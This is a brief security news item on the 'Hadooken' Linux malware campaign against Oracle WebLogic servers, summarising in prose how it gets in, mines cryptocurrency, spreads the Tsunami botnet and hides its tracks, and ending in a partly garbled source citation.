A new malware campaign targeting Oracle WebLogic servers has been identified, exploiting vulnerabilities in Linux environments to mine cryptocurrency and launch distributed denial-of-service (DDoS) attacks. Dubbed “Hadooken,” this malware was discovered by Aqua Security researchers. It infiltrates systems through weak credentials or unpatched Oracle WebLogic servers, which are commonly used in enterprise environments for critical applications.
Hadooken operates by deploying two payloads: a shell script and a Python script. These scripts retrieve the malware from remote servers, and once inside, Hadooken performs several malicious actions, including mining cryptocurrency and distributing the Tsunami botnet. The Tsunami botnet has a history of targeting services like Oracle WebLogic and Jenkins, often deployed in Kubernetes clusters. It is particularly dangerous due to its ability to launch both cryptomining operations and DDoS attacks.
One of the malware’s strategies involves creating cron jobs to ensure persistence, running the cryptominer at random intervals while blending its malicious activities with legitimate system processes. Additionally, it wipes system logs to make detection and forensic analysis more difficult.
This attack highlights the importance of keeping systems updated and properly configured, especially as Hadooken exploits known vulnerabilities in Oracle WebLogic servers. The infrastructure behind the attack is linked to Aeza International LTD, a known bulletproof hosting provider involved in previous cryptomining and ransomware campaigns.
For more details, you can refer to the sources from Aqua Security and BleepingComputer (
BleepingComputer)tps:/(
CyberMaterial –)ingcomputer.com/news/security/new-linux-malware-hadooken-targets-oracle-weblogic-servers/) and here.
